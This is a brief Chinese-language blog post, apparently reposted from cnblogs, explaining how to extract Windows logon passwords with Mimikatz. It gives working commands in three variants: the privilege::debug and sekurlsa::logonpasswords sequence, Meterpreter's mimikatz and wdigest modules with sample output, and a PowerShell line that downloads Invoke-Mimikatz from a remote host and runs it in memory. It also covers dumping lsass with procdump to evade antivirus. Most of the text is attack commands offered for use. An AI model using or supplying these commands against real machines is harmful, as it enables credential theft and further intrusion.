使用Mimikatz读取密码

 法一:

  https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170813

  

第一条:privilege::debug    //提升权限
第二条:sekurlsa::logonpasswords      //抓取密码

 

注:请以管理员权限!!!

  (什么?要管理员权限!有管理员权限了还要你干嘛....)

法二:

  meterreter下已集成了mimikata

  

meterpreter > load mimikatz

meterpreter > wdigest 
[!] Not currently running as SYSTEM
[*] Attempting to getprivs
[+] Got SeDebugPrivilege
[*] Retrieving wdigest credentials
wdigest credentials

法三:

  powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

 当出现目标机器不能上网的时候也可以就近搭个web服务 然后下载ps1....

另一种方法是procdump结合Mimikatz。

好处:免杀

NT6可以使用自带的提取功能

mimikatz # sekurlsa::minidump hellolsass.dmp
Switch to MINIDUMP
 
mimikatz # sekurlsa::logonPasswords full

注:这种需要在目标环境系统与本地mimikatz的运行品台兼容。

不要因为走了太久而忘记当初为什么出发
原文地址:https://www.cnblogs.com/landuo11/p/7395944.html